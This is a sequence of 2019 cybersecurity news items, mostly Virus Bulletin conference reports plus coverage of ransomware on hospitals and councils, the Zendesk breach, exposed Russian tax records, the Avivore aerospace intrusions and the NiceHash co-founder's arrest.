Cyber Risk News
Morals and ethics should be considered when it comes to making decisions in cybersecurity.
Speaking at the Virus Bulletin 2019 conference in London, Ivan Kwiatkowski, security researcher at Kaspersky Lab, said that there are not a lot of discussions on ethics in cybersecurity, as the concept of white hat versus black hat is “the wrong way to think about things” as even the subject of ethical hacking rarely covers the issue of ethics.
Saying he was talking to people “who were thinking of doing something terrible but had not stopped to think about it yet,” he said that this a young industry and we had not developed a moral compass yet, and it is not an issue of maturity or diversity, but people rely on their personal intuition on the decisions that they face.
“Nobody wants someone to tell them right from wrong” he added, but he urged people to realize that “knowledge is power and if you control what people know about something, you can convince people.
“Infosec is about controlling what access people have to certain information.” He said that there are ethical dilemmas that people may face. such as:
- A legitimate hacking problem – that intelligence agencies and military attack organizations, and some nations set up a “surveillance apparatus which can be invaluable in preventing terrorism,” whilst others rely on “hacking back”, and some people carry the term of hacktivist and feel justified in hacking something or someone
- Vulnerability handling – when we find a vulnerability, Kwiatkowski said that we still need to reach an agreement on how to handle vulnerabilities. Some companies specialize in selling hacking tools and exploits, and swear that they only do business with governments with a good track record of democracy and human rights. However, he argued: “In some cases, there have been suspect decisions in that regard”
In the case of exploits being sold on the offensive market, he asked if it is a legal or moral issue, as moral decisions change over time. “All cultures may disagree on what morals are, we all have a moral code and maybe those questions are unsolvable and unescapable.”
He went on to say that we “owe it to ourselves” to determine what constitutes ethical behavior and what does not. Concluding, he recommended “allocating more attention to ethics” and said that it was time we adopted a global code of conduct too, and cited the EFF as being able to push that standard.
He also called on conference organizers to consider this, and to concentrate less on celebrities “especially those celebrities whose success may be traced back to suspicious behavior” and instead, he recommended conference organizers to invite philosophers and “victims of cyber-abuse to tell their stories” to let us know our shortcomings.
Speaking at the Virus Bulletin 2019 conference in London, members of the Cyber Threat Alliance discussed the benefits of sharing intelligence.
Led by moderator and Cyber Threat Alliance COO Heather King, panelists Kathi Whitbey, program manager of cyber threat intelligence information Sharing at Palo Alto Networks and Jeannette Jarvis, director product marketing at Fortinet, said that there are clear benefits to sharing data, as Jarvis explained: “There is the opportunity to expand and share more deeper intelligence.”
Jarvis said that there is an intention with the Alliance to “build equal or better ecosystems beyond what our adversaries are doing, and to know what they are sharing” and this can better protect customers with “actionable intelligence.”
Whitbey added that the founding members believed in the “power of collaboration and sharing.” Asked by King how the Cyber Threat Alliance is unique, Jarvis admitted that all of the members have different missions, but the collaborative nature means that companies can get enough data to get the complete picture of an issue.
Pointing at the WannaCry incident in 2017, Whitbey said that within hours they knew what each other was seeing and what the issue was, and “we were able to paint a picture as everyone provided what they had and we could see all the information in real time.”
Jarvis admitted that “no one has all the information” and by sharing they get the complete picture and fill in the gaps.
The panellists explained that the members don’t have the same technology, customers or are in the same regions, “but if we collaborate we all get into the environment,” Whitbey said.
Jarvis reflected on a previous role at an aerospace company, saying that it was clear from working in that role “that we need to be more connected to help customers.”
Despite the main infections taking place two and half years ago, a large number of computers remain vulnerable to the WannaCry ransomware.
Speaking to Infosecurity at the Virus Bulletin 2019 conference in London, Sophos security researcher Chet Wisniewski said that there are large numbers of businesses who did not apply the patches, released in March and after the infection in May 2017, so machines still remain vulnerable. “That’s what surprised me, with the amount of hype and the amount of news around that vulnerability, it shows that even standing on the rooftop and lighting your hair on fire is not going to be enough for people to take action,” he said.
“The good news is that there is an accidental vaccination which means that the good people won’t get infected with it,” he said. He explained that a version of WannaCry drops a payload, but that payload is currently corrupted and if another infection is attempted, if that file is detected at all, the infection will not take place.
“Fortunately, all of these copies of WannaCry we’re seeing are neutered,” he added. “It’s not hurting anyone, it’s just spreading around and making a lot of noise.”
Wisniewski went on to say that people are still not realizing that “these weaponized exploits are really dangerous, and BlueKeep has been an interesting trial of this.” In that case, he said that wormable exploits are typically published within hours, but in the case of BlueKeep that has only been added to Metasploit and other companies are using it as a penetration testing tool.
“If people have not patched since 2017, if a BlueKeep publicly exploitable worm was released, instantly millions of machines would be impacted again, and we would be in the same boat as when WannaCry was spreading around,” he said. “Every single one of those machines would be vulnerable as they have not been patched in two years, not to mention all of those that have been patched since.”
Cyber-attacks on UK businesses surged by a whopping 243% over the summer, compared to the same period last year, according to new findings from Beaming.
The Hastings-based business ISP analyzed data from the thousands of organizations across the UK that it supplies.
It found that UK firms experienced 157,528 attacks each on average between July and September, up from 45,970 during the same three months of 2018.
The firm detected nearly 500,000 unique IP addresses used to launch cyber-attacks on UK businesses during the period, with the number originating from China more than doubling over last year. A large number of attacks also originated in Taiwan, Brazil and Russia, Beaming said.
The most frequently targeted systems were Internet of Things (IoT) devices and file sharing services, accounting for 20% and 6% of attacks respectively.
FireEye warned in June of a “dramatic” increase in abuse of file sharing services such as WeTransfer, Dropbox, Google Drive and OneDrive, which are used to host malicious and phishing files in email-borne attacks.
What’s more, cyber-criminals are increasingly gearing up to exploit unprotected IoT devices, according to a Trend Micro report released last month. The firm analyzed chatter on dark web forums across the globe and found routers and IP cameras were the most commonly discussed devices.
Businesses face a threat on two fronts: they could be DDoS-ed or attacked in other ways from botnets of compromised IoT machines like these; or their own operational technology could be hijacked and sabotaged, disrupting key business and manufacturing processes.
“Previous summers have been relatively quiet when it comes to cybercrime, but the hackers haven’t yet taken a break this year. Throughout 2019 we have witnessed new highs in the volume of cyber-attacks hitting organisations in the UK and also the number of active agents behind those attempts,” said Beaming managing director, Sonia Blizzard.
“We are tackling more and more malicious code at a network level to minimize the threat of online attacks to our customers. The hackers are after the weakest link they can find, so companies need to boost their resilience to these sustained, indiscriminate attacks. They can do this by ensuring their software and cybersecurity defenses are up-to-date, putting in place measures such as managed firewalls and educating employees to help them avoid the main risks they could be exposed to.”
The UK’s local authorities are facing an unprecedented barrage of cyber-threats, amounting to almost 800 every hour in the first half of 2019, according to insurance broker Gallagher.
Of the 203 councils that responded to the firm’s Freedom of Information (FOI) requests, nearly half (49%) had been targeted since the start of 2017, with over a third (37%) attacked in the first half of the year.
Over the first six months of 2019, those councils experienced 263 million attacks — a number that is likely to be much higher if those authorities which chose not to answer the FOI request were factored in.
However, despite the barrage, most authorities seem to be holding up: just 17 attacks were reported to have resulted in the loss of data or money, although one council reported the loss of over £2m, according to Gallagher.
Just 13% of local authorities have cyber insurance, a figure the firm would obviously like to see much higher.
“Councils are facing an unprecedented number of cyber-attacks on daily basis. While the majority of these are fended off, it only takes one to get through to cause a significant financial deficit, a cost which the taxpayer will ultimately foot,” argued Tim Devine, managing director of Public Sector & Education at Gallagher.
“Costs and reputational damage at this scale can be devastating for public authorities, many of which are already facing stretched budgets. In many scenarios, the people responsible for purchasing cyber-insurance products need decisions to be made at member, or management level. The cyber threat and the need for cover needs to be high on every local authority’s agenda.”
However, most of the attacks noted in the report are likely to be the result of “automated probing and discovery tools” and therefore should not be classed as true security incidents, according to Tripwire senior director, Paul Edon.
“However, the truth of the matter is that many local authorities and councils still remain unprepared for a true cyber-attack,” he added.
“To get security right, organizations need to get the basics right. Start by understanding the risk you have. You must conduct regular, preferably continuous, assessments of configuration and vulnerability risk across your IT systems. Then ensure systems are regularly patched and upgraded. Following these basic security hygiene rules will go a long way to making your systems secure and the attackers’ job more difficult.”
Security and privacy experts have heavily criticized an attempt by the UK, US and Australian governments to strong arm Facebook into halting its roll-out of end-to-end encryption.
Mark Zuckerberg announced a major overhaul of the social network in July following its $5bn fine from the FTC — a move which will include creating a privacy-by-design culture in the firm and extending end-to-end encryption beyond WhatsApp to Instagram and Messenger.
However, western governments are predictably dismayed at any efforts which will confound attempts by their intelligence agencies and the police to track suspects.
A widely reported open letter to Facebook from three-fifths of the Five Eyes nations demanded that the firm not continue with the encryption roll-out “without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.”
That effectively means backdoor access for governments and law enforcers, something that the world’s leading cryptographers have repeatedly stated is not possible without undermining security for all.
Hannah Quay-de la Vallee, senior technologist at the non-profit Center for Democracy and Technology (CDT), repeated these arguments.
“Strong encryption and end-to-end security are bedrock technologies that keep information safe online. These technologies protect billions of communications every day, from the sensitive correspondence of victims of domestic violence to businesses’ financial records to our private medical information,” she explained.
“Creating a law that would mandate weaker and less secure technology is like mandating crumbling sidewalks to prevent criminals from escaping. It’s ridiculous, it won’t work, and it puts us all at far greater risk of serious injury.”
NSA whistleblower Edward Snowden also chipped in, warning that if Facebook caves to these government demands, “it may be the largest overnight violation of privacy in history.”
That doesn’t seem likely though, with a Facebook statement issued to confirm: “We strongly oppose government attempts to build backdoors because they would undermine the privacy and security of people everywhere.”
The open letter comes as the US and UK trumpeted a new “world first” data sharing agreement, that will allow law enforcers on both sides of the Atlantic to demand data from tech firms in the other country without needing to go through a lengthy liaison process with their respective governments.
The US Food and Drug Administration (FDA) issued a warning on Tuesday over vulnerabilities detected in decades-old software being used by many medical devices and hospital networks.
The 11 vulnerabilities exist in IPnet, a third-party software component that supports network communications between computers. If exploited, the vulnerabilities could allow hackers to remotely control a medical device, change its function, obstruct service, or trigger information leaks that could stop it from working.
Makers of the original IPnet software, Interpeak, no longer support it, but some manufacturers have a license to use it without support, meaning it could be incorporated into other software applications, equipment, and systems still in use in medical devices.
When the vulnerabilities were discovered, it was thought that they only affected some versions of the popular real-time operating system Wind River VxWorks. However, the true impact of the cybersecurity risk is much greater because the IPnet software was licensed and used in multiple operating systems employed by the healthcare industry.
According to the FDA, some versions of operating systems Integrity by Green Hills, ThreadX by Microsoft, Operating System Embedded by ENEA, ITRON by TRON Forum, and ZebOS by IP Infusion may contain the vulnerable software component.
Medical devices affected so far include an imaging system, an infusion pump, and an anesthesia machine. The FDA said in its warning that it "expects that additional medical devices will be identified that contain one or more of the vulnerabilities associated with the original IPnet software."
IPnet's vulnerabilities are zero-day, meaning that they have existed since the software's creation.
The Cybersecurity and Infrastructure Security Agency issued a warning regarding cybersecurity vulnerabilities in Wind River VxWorks on July 30.
The document, which was put together by the FDA and Health Canada, says regarding third-party components: "These components can create risk of their own, which is managed by the manufacturer through risk management, quality management, and design choice. Manufacturers should manage the cybersecurity implications of the components—software and hardware—that are part of their devices.
"Similarly, post-market issues with a third-party component may also affect the security of the medical device, and manufacturers need to manage this risk. Users expect the manufacturer to understand how a security vulnerability in an underlying component such as an operating system or processor affects the medical device. Regulators will require it."
Ransomware gangs, intent on stealing American dollars, have struck at least 621 targets in the US government, education, and healthcare sectors since January.
A report into stateside ransomware attacks, released on October 1 by antivirus company Emisoft, which is an associate partner in Europol’s No More Ransom Project, paints a picture of a nation in a serious cyber-predicament.
At least 68 state, county, and municipal entities have been impacted by this particular type of attack since the beginning of the year. In just one attack on Baltimore, MD, carried out in May using the ransomware RobbinHood, recovery costs are estimated to have been $18.2 million.
A Ryuk attack on Lake City, FL, in June led to insurers forking over a $460,000 ransom minus a $10,000 deductible, and only part of the data affected was recovered.
So far this year, there have been at least 62 ransomware incidents involving school districts and other educational establishments, which potentially impacted operations at up to 1,051 individual schools, colleges, and universities.
The healthcare sector has suffered just under 500 attacks since this year's ball drop in Times Square heralded the start of 2019.
Fabian Wosar, Emisoft CTO, told Infosecurity Magazine: "When we look at absolute numbers in all areas—business, government, and home users—ransomware is on the decline. However, this is mostly due to the fact that ransomware gangs focus on business and government targets these days instead of the large-scale spray-and-pray attacks against home users that were dominant just a few years ago. So, while the pressure on home users went down dramatically, it skyrocketed for those other areas."
Describing the biggest ransomware payout he had come across, Wosar said: "The biggest confirmed payout I have seen was $700,000, but I cannot disclose specific details about that case."
How an organization decides to deal with a ransomware attack has a major bearing on whether it will be re-targeted at a later date.
Wosar told Infosecurity Magazine: "What definitely will make you a big target is if you got ransomed and paid. During a lot of these attacks we have seen ransomware groups leave behind backdoors that allow them to access the systems again in the future. Given this backdoor access and your willingness to pay for your data, you become a prime target for a second attack later down the line."
Sharing his predictions on how ransomware attacks will evolve, Wosar said: "I believe that attacks on organizations with outsourced infrastructure and IT will become increasingly common. The tools used by MSPs and other service providers act as a gateway to their clients’ systems and, as we saw in the Texas and PercSoft incidents, enable multiple organizations to be ransomed in one fell swoop."
The co-founder and former CTO of cryptocurrency mining marketplace NiceHash has been arrested by German federal police in connection with US charges of racketeering and fraud.
According to the news website 24ur.com, Matjaz Škorjanc was arrested on Monday in Schwarzbach after crossing the German border in a car with Slovenian license plates.
Slovenian national Škorjanc is wanted in the US on suspicion of being a member of a criminal organization that committed a number of cyber-frauds between 2008 and 2013.
The US alleges that the 33-year-old set up and managed online password-protected hacking forum Darkode, in which cyber-criminals convened to buy, sell, trade, and share information, ideas, and tools to facilitate unlawful intrusions into others’ computers and electronic devices.
Darkode was shut down in 2015 as part of an internationally coordinated law enforcement effort called Operation Shrouded Horizon.
Škorjanc, who was known online as "iserdo" and "serdo," is further accused of creating and deploying the malicious botnet Mariposa, which harvested personal data from nearly a million computers around the world. Mariposa caused estimated damages of around $4 million after using cyber-scamming and denial-of-service (DOS) attacks to effectively turn infected computers into remotely controlled zombies.
An indictment was filed in the US District Court for the District of Columbia on December 4, 2018, against Škorjanc, fellow Slovene Mentor Leniqi, Spaniard Florence Carro Ruiz, and American Thomas McCormick. Each of the accused was charged with racketeering conspiracy and conspiracy to commit wire fraud and bank fraud. The racketeering conspiracy charge includes conspiracy to commit bank, wire, and access device fraud, identity theft, hacking, and extortion.
McCormick—the last known administrator of the Darkode forum—was also charged with five counts of aggravated identity theft. He was arrested at the FBI’s Washington Field Office in Washington, DC, six days after the indictment was filed.
If convicted of the charges, each of the accused could spend up to 50 years behind bars.
Škorjanc has already served four years and ten months in a Slovenian prison after being convicted for his role in the Mariposa botnet.
Škorjanc's father and H-Bit CEO Martin Škorjanc said: "There is no real legal basis for the prosecution, as Matjaz Škorjanc was already convicted for the same act as prosecuted by the US prosecutor, and the sentence has already been fully passed in Slovenia.
"It is an inadmissible retrial of the same thing; it is forbidden by Slovenian, European, and American law."
The annual Security Serious “Unsung Heroes” awards were announced at an event in central London last night.
The fourth annual awards are intended to celebrate the people of the cybersecurity industry, recognizing the individuals and teams working hard to protect Britain from cybercrime and raise awareness of security issues.
“It can often be a thankless task working in cybersecurity; and as an industry, we tend to focus on technology and innovation,” said lead organizer of Security Serious Week, Yvonne Eskenzi.
“The cyber skills gap is a huge issue for this country and an event like this really shows off what a great industry it is to be a part of and the wonderful people that make it.”
The full list of winners were:
Winner: Joe Hancock – MDR Cyber
Highly Acclaimed: James Packer – (ISC)2
Winner: Dan Raywood – Infosecurity Magazine
Highly Acclaimed: Kate O'Flaherty – Tech Journalist
Best Security Awareness Campaign
Winner: Host Unknown
Highly Acclaimed: City of London Police
Winner: Hamish McGowan – Channel 4
Highly Acclaimed: Sophia McCall – Bournemouth University
Winner: Jonathan Armstrong – Cordery Compliance
Highly Acclaimed: David Hyett - UKRI
Winner: Bayside School Cyber Club supported by GVC Group
Highly Acclaimed: Toni Scullion and the Turing’s Testers
Best Ethical Hacker / Pentester
Winner: Rob Hillier – XQ Cyber
Winner: Quentyn Taylor – Canon Europe
Highly Acclaimed: Shan Lee – Transferwise
Godparent of Security
Winner: Paul Simmonds – Global Identity Foundation
Highly Acclaimed: Adrian Davis – Consulting COO & CIO
Security researchers have identified a new state-backed threat group they believe to be behind the recently disclosed attacks on European aerospace supply chain companies and organizations in other verticals.
Reports had suggested the attacks — which affected UK engine-maker Rolls Royce, French tech supplier Expleo and two other French Airbus suppliers — had been carried out either by China’s APT10 group or a regional branch of the country’s Ministry of State Security, known as JSSD.
However, security researchers at Context believe the attacks are the work of another nation state hacking group. Although the firm falls short of blaming China, it admits that the “Avivore” group does operate in the same time zone, and shares some similarities with APT10/JSSD.
The group’s attack methodology follows a set pattern. After using compromised user credentials and legitimate remote access tools to infiltrate targeted networks, hackers escalate privileges by abusing legitimate tools and/or highly privileged accounts.
Next, they conduct account and host enumeration using “net” commands, schedule execution of scripts and tooling run in the context of the “SYSTEM” user, and remove any traces of scripts, tooling and event logs following execution. RDP is also used for lateral movement.
While many supply chain attacks are “vertical” in nature, involving an initial compromise of MSPs or software vendors, the Avivore campaigns are more “horizontal” — relying on island hopping techniques.
The group abused the commercial VPNs and other collaborative solutions used by large multi-nationals and smaller engineering or consultancy firms in their supply chain. Other legitimate tools leveraged by Avivore include network scanning and certificate extractions tools, and Windows SysInternals tools such as ProcDump.
Binaries were disguised as Windows DLLs, with tools executed remotely using scheduled tasks and then removed, according to Context.
“Avivore showed themselves to be highly capable; adept at both 'living-off-the-land' and in their operational security awareness; including forensically covering their tracks. They demonstrated detailed knowledge of key individuals associated with projects of interest, and were able to successfully mirror working times and patterns of these users to avoid arousing suspicions,” explained the report.
“They were also able to manipulate victim environments and security controls to facilitate and obfuscate their activities: e.g. modifying firewall rules to accept RDP over alternate ports; establishing hosts within the victim environment as remote access proxies.”
Although most Avivore activity has taken place since early 2018, the researchers claimed that the PlugX Remote Access may have been deployed on victim networks as early as October 2015.
Other verticals thought to have been targeted include automotive, consulting, energy/nuclear and satellite/space technology.
Customer support software giant Zendesk has discovered a security breach dating back to 2016, affecting thousands of corporate clients.
After being alerted to the incident by a third party, the firm last week identified 10,000 Zendesk Support and Chat accounts which had been accessed by an unauthorized third party.
Although this number contained some trial accounts and others that are no longer active, Zendesk has a number of high-profile clients including Airbnb, Uber and OpenTable that could be affected.
There’s apparently no evidence that ticket data was accessed. However, email addresses, names and phone numbers of agents and end users of certain Zendesk products up to November 2016 were accessed, as well as hashed and salted agent and end user passwords. In this context, “agents” are the customer support staff from client organizations who use the software, while “end users” are their customers.
The firm said there’s no evidence these passwords were used to access Zendesk services.
In addition, for around 700 accounts, the TLS encryption keys and the configuration settings of apps installed from the Zendesk app marketplace or private apps were accessed.
“As a precautionary measure, in the next 24 hours, we are starting to implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016,” Zendesk explained.
“This password rotation will impact all other products which share authentication with Support, including Guide, Talk and Explore. Upon their next login, each of these users will be required to create a new password. You will not be impacted by this if we have been able to identify that you have updated your password since November 1, 2016 or have implemented Single Sign-On in connection with your account.”
The firm urged customers with accounts dating back prior to November 1 2016 to: rotate all credentials for any Zendesk Marketplace or private apps, upload new TLS certificates and revoke the old ones and rotate authentication credentials used in Zendesk products before the November date.
Over 20 million Russian tax records were found publicly exposed in a misconfigured Elasticsearch database last month, in yet another privacy snafu.
Security researcher Bob Diachenko teamed up again with Comparitech to discover the unsecured server, which contained personally identifiable information (PII) on Russian citizens dating from 2009-2016.
Lacking password protection or any other authentication mechanism, the Amazon Web Services Elasticsearch cluster was first indexed by search engines in May 2018. Diachenko discovered it on September 17 and notified the Ukraine-based owner.
Although the researchers are still unclear what entity managed the database, it was made inaccessible three days after Diachenko raised the red flag.
The unencrypted PII included names, addresses, residency status, passport and phone numbers, tax ID numbers, and employer names and phone numbers. It sat exposed for over a year.
“The cluster contained multiple databases. Some seemed to contain mostly random and publicly sourced data. Two databases, however, included tax and personally identifiable information about Russian citizens. Most of those citizens appear to be from Moscow and the surrounding area,” explained Comparitech’s Paul Bischoff.
“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over six million from 2009 to 2015.”
The data is highly sensitive and could be used to craft convincing follow-on phishing and identity fraud schemes.
Organizations across the globe are failing to protect their Elasticsearch databases. This year alone, researchers have used simple online search tools to find: 8TB of email metadata belonging to a leading Chinese university, 24 million financial records from multiple banks, a copy of the Dow Jones Watchlist containing 2.4 million records and PII on 82 million Americans exposed by a mystery company.
AWS S3 buckets and MongoDB instances are also commonly misconfigured, exposing countless organizations and their customers to the threat of data theft.
Speaking at the Virus Bulletin 2019 conference in London, Cybereason researchers Amit Serper, Mor Levi and Assaf Dahan discussed the “worldwide campaign against telecommunication providers” that they coined Operation Soft Cell.
Described by Serper as an access operation which was a “multi-wave attack,” he said that the operation targeted call detail records (CDRs) which contain details of call information, where calls are made and the originating number and IMEI number.
“With this you can build a complete picture of a person and where they are located through the day,” he said. “You get a lot of information without getting on the phone as metadata is siphoned off.”
Levy said an investigation usually started with small pieces being tied together, and the researchers were able to learn more about the attacker. Levy said that the investigation started in 2018, and nothing was unusual at first, but second, third and fourth waves of attack were spotted, which led them to conclude that this was the same actor “as behavior and techniques were almost the same, and they were adaptive and changing indicators to bypass detection.” It was later revealed by the researchers that the compromise had sometimes gone on for up to seven years.
During the third phase, the researchers realized the attacker was not after bill data or domain administrator details.
Dahan said that the attacker was able to get in, do external reconnaissance, and use third party tools for exfiltration and to move laterally and obtain credentials.
“We understood that the attack was on exfiltration, as they compressed and password protected it,” Dahan said. Serper pointed out that remote access Trojans like Poison Ivy were used.
Levy added that it was “hard to connect the dots but we knew the bigger picture,” and the purpose of the threat intelligence research was to get the big picture. The companies were informed, and it initially expanded from Cybereason’s customer to dozens of other telcos.
The research also revealed that a lot of the attacks took place in GMT+8, the Chinese time zone, where a two-hour lunch break was also taken. Serper concluded by saying that upon telling those affected, he got very negative responses as “cyber insurance doesn’t cover nation state attacks as it is an act of war.”
Threat actors have been using cyber-disguises to keep their true intentions secret, according to a report published today by Optiv Security.
Typical cyber threat intelligence usually categorizes threat actors in fixed classes, such as nation-states, cyber-criminals, commercial entities, and hacktivists. But, according to Optiv’s new 2019 Cyber Threat Intelligence Estimate (CTIE) report, "it’s a mistake to assume these categories are rigid or to assume that a threat actor’s classification is static."
The CTIE report is inspired by national intelligence estimates, which are analytic reports produced by the intelligence community of the United States for consumption by Congress. The CTIE comprises contributions from Optiv’s Global Threat Intelligence Center (gTIC), cyber threat intelligence company IntSights, and Carbon Black, a leader in cloud endpoint protection.
Optiv researchers found that it's not unusual for threat actors to have multiple criminal identities that they can switch between to get what they want without revealing who they are or what their actual agenda is.
For example, nation-state actors may pretend to be just a regular cyber-criminal targeting a company’s customer database, when in reality their target is to delve into the firm's deepest recesses to steal its intellectual property.
According to the report: "Sometimes threat actors may masquerade as a certain type in order to hide their true agenda. Or, threat actors may belong to two or more classes, switching between them as their priorities change."
Threat actors who demonstrate this switching behavior to cloak the true nature of their dastardly deeds are described by Optiv's researchers as "hybrid threat actors." According to the report, their primary targets are governments, manufacturing, energy, and utilities.
According to Optiv CISO Brian Wrozek, spotting when an impersonation is taking place is "quite difficult." He told Infosecurity Magazine: "Imagine robbing a bank, but the bank robber is able to present themselves as a police officer. It would be extremely difficult to identify that person. Security professionals look for patterns, which can create opportunities for bad actors to abuse those patterns to obscure their true identities."
Asked which class of threat actor is the easiest to impersonate, Wrozek said: "It’s difficult to say which is easiest, but one of the most common places we see this is in regard to nation-states. With so much politically driven activity regarding cybersecurity happening across the globe, it can be easy for nation-states to play the blame game with one another, making attribution difficult. Also, no one likes to admit they got hacked by some random individual. Saying a rich, powerful nation-state was behind an attack is much less embarrassing, so there’s that aspect to consider as well."
Other findings of the report are that crypto-jacking and ransomware attacks are increasing in popularity, and that retail, healthcare, government, and financial institutions continue to be among the most targeted verticals of cybersecurity attacks or attempts among the 10 categories of Optiv clients.
"Cyberspace has become more hostile. Hackers are more organized and sophisticated in 2019, and we’re seeing malicious attackers increase their counter measures to avoid detection,” said Tom Kellermann, chief cybersecurity officer at Carbon Black.
"According to our research, no vertical is immune, but the financial industry continues to stand out as a key target for advanced attacks. We hope cybersecurity leaders and teams will use this data as a clarion call to improve their cybersecurity postures."
Ten hospitals in Australia and the United States have been hit by ransomware attacks since Monday.
In America, computers at three Alabama hospitals operated by DCH Health System were affected, causing staff to close their doors to any new patients who weren't critically ill.
In a statement posted on their website earlier today, DCH wrote: "Early Oct 1, the DCH Heath System discovered that it had suffered a ransomware attack that impacted their systems. We immediately implemented emergency procedures to continue providing safe and patient-centered care."
The hospitals affected by the attack are DCH Regional Medical Center in Tuscaloosa, Fayette Medical Center and Northport Medical Center. While access to computer systems remains limited, local ambulances are taking patients to other healthcare providers located nearby.
Surgeries scheduled for tomorrow will go ahead however outpatients with appointments at any of the three hospitals affected by the ransomware attack are advising to call to confirm before attending.
Services at seven hospitals and healthcare facilities in Australia have likewise been boggled by ransomware in a separate cyber-attack which struck in Gippsland and south-west Victoria on Monday.
The impacted hospitals are part of the South West Alliance of Rural Health and also of Gippsland Health Alliance. Multiple computer systems have been disconnected to while the Victorian Cyber Incident Response Service works to resolve the situation.
Barwon Health, which operates hospitals affected by the attack, said that some elective surgeries and appointments had been cancelled.
The Victorian government's Department of Premier and Cabinet said: "A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.
"At this time, there is no suggestion that personal patient information has been accessed."
Commenting on the ransomware attacks, senior director of managed threat response at Sophos, J.J. Thompson, said: "Ransomware is foreseeable and preventable. Organizations need to have effective, advanced protection in place at every state of an attack. The techniques, tactics and procedures that occur prior to a ransomware incident can and should be detected by existing security capabilities and are foundational pillars to the patient care model in healthcare 4.0.
"It’s also important to have off-site backups to reduce the pressure to comply with expensive ransom demands and to be able to recover faster."
America's National Security Agency has launched a new organization to beef up the country's defenses against cyber-attackers.
The Cybersecurity Directorate has been created to unify the efforts of the NSA's existing foreign intelligence and cyber-defense missions. The new organization will bring the Agency's threat detection, future-technologies, and cyber-defense personnel together under one roof for the very first time.
Underpinning the creation of the directorate is the idea that forming partnerships to allow intelligence and technical expertise to be pooled and operationalized represents America's best chance of thwarting cyber-adversaries.
A spokesperson for the NSA said: "Many organizations work tirelessly to protect against today’s threats and tomorrow's risks, but the adversaries are tenacious, and they only need to be successful once.
"The Cybersecurity Directorate will reinvigorate NSA’s white hat mission by sharing critical threat information and collaborating with partners and customers to better equip them to defend against malicious cyber activity.
"The new directorate will also better position NSA to operationalize its threat intelligence, vulnerability assessments, and cyber-defense expertise by integrating these efforts to deliver prioritized outcomes."
One of the NSA's partners is the Department of Homeland Security, with whom the Agency has been working to identify and monitor the systems in the financial sector that make the easiest hacking targets.
By launching the new directorate, the NSA hopes to strengthen the cyber-shield protecting the country's national security systems and critical infrastructure from threat actors.
Topping the freshly launched organization's list of priorities are defending America's industrial base and innovating ways to improve the security of the nation's extensive arsenal of weapons.
Helping to safeguard the private sector is also something that the new directorate will focus on. Efforts will be made to declassify threat intelligence received by the new organization as speedily as possible so that it can be shared with US businesses.
NSA director General Paul Nakasone said: "What I’m trying to get to in a space like cyberspace is speed, agility, and unity of effort."
Leading the new Cybersecurity Directorate is director of cybersecurity Anne Neuberger, who reports directly to General Nakasone. Her previous positions include NSA’s first chief risk officer, deputy director of operations, and lead of NSA’s Russia Small Group.
Speaking at the Virus Bulletin 2019 conference in London, Yonathan Klijnsman, head of threat research at RiskIQ, said that many groups had been identified as being behind recent Magecart attacks, but new movements were being made towards more targeted attacks.
Pointing to Group 6 that IBM’s X-Force published a report on, Klijnsman said that “once they are in your network they will know more than you do, they are the admins you want to hire.” The group later hit both NewEgg and British Airways, having access to the former for six months, but crucially not being present during Black Friday, as they had been detected and removed by then.
Another called Group 5 are “experts in support,” and Klijnsman said that they know of at least 20 suppliers that have been hit by this group. “They hit one supplier who had over 100,000 victim websites” and while it delivers malicious code, it will not have access to payment data.
A group that RiskIQ plans to reveal more details on in the coming months is Group 15, who Klijnsman said are “very specialized” as they have built a framework for skimming, and are able to remove a payment form and put their own in it's place.
This, he said, was part of the evolution of the groups, as they are doing more targeting and learning more about content management systems. In the case of the attack on Ticketmaster, this was enabled by a compromise of Sociaplus between December 2017 to June 2018.
This was part of one of the three main compromise capabilities: via outdated or misconfigured systems, via password reuse as groups are looking at breached user lists and supply chain attack.
“The latter is not something people are talking about and while you want analytics and CDNs and services, they make you vulnerable and make your customers and visitors vulnerable to attack.”
As it prepares to mark its third anniversary of opening, the National Cyber Security Centre (NCSC) has said that defending the UK is a team effort and encouraged more businesses to work with it.
Speaking at the Virus Bulletin 2019 conference in London, director of operations at the NCSC Paul Chichester, reflected on the work done to create the NCSC, and how UK businesses needed to work alongside it.
Chichester explained that the momentum for a response center had begun when, in the 2000s, the attackers targeting the UK were looked at closer, and today “there are 20 nation state threats that we track” and while it does not track all threats and compete with commercial companies, it can “understand additional insights.”
He said that with 20 years of capability and insight to understand threats to the UK, the government funding in 2010 led to the development of the NCSC, which solved the problem of the “obvious flaws in the approach that the UK took,” in particular that there was no single point or place to go to report issues.
Admitting that the work of the NCSC will not stop the UK being an interest for attackers, Chichester pointed out that it is able to counter threats. “Our work in the past has been on observing threats, and our view is that it is not about counting but countering the threat,” he added.
He also said that as the NCSC is responsible for attribution, the UK government understands the context of threats and can assess threat as it pertains to the UK. “Also, we don’t respond with a red button, but by helping people, reporting to the victim and doing victim notification,” he continued, that the NCSC does “a huge amount of work in the UK and works with organizations to help them recover. Attribution is an art, not a science,” he said.
He concluded his talk by saying that the NCSC wants to collaborate more, and work with people in the industry “and for us it is a team sport and please talk to us - we care about the things you care about.”
Later speaking to Infosecurity, Chichester said that the efforts undertaken by the NCSC include doing formal attribution, and protecting the anonymity of the organizations it protects. As part of this, it feeds tactical intelligence via its CISP and partner channels, and he said that companies are often not judged by the compromise, “but how they deal with it.”
Asked if businesses are coming to the NCSC to collaborate, Chichester said they are “massively” and this is fundamental for the business. “We want people to come to us to get insight into threats at a macro level, and we want to work with organizations to help us understand what they are seeing and doing [regarding] incident response.”
Nearly two-thirds of businesses which rely on SAP or Oracle have suffered a breach of their ERP systems in the past two years, according to new research from Onapsis.
The security vendor commissioned IDC to poll 430 IT decision makers knowledgeable about their organization's ERP applications.
Of the 64% that have suffered a breach of SAP or Oracle E-Business Suite (EBS), sales data (50%) was most commonly compromised, followed by HR data (45%), personal customer information (41%), intellectual property (36%) and financial data (34%).
The range of sensitive information listed above highlights the crucial role security teams have in protecting ERP applications, especially considering that, on average, three-quarters (74%) of these ERP applications were internet connected.
“ERP applications can be foundational for businesses. A breach of such critical ERP applications can lead to unexpected downtime, increased compliance risk, diminished brand confidence and project delays,” said Frank Dickson, program vice-president, cybersecurity products with IDC.
“Cyber-miscreants seem to be indiscriminate when it comes to ERP systems, having an appetite for all types of data, which, if in the wrong hands, could be detrimental to the business in terms of revenue and reputation.”
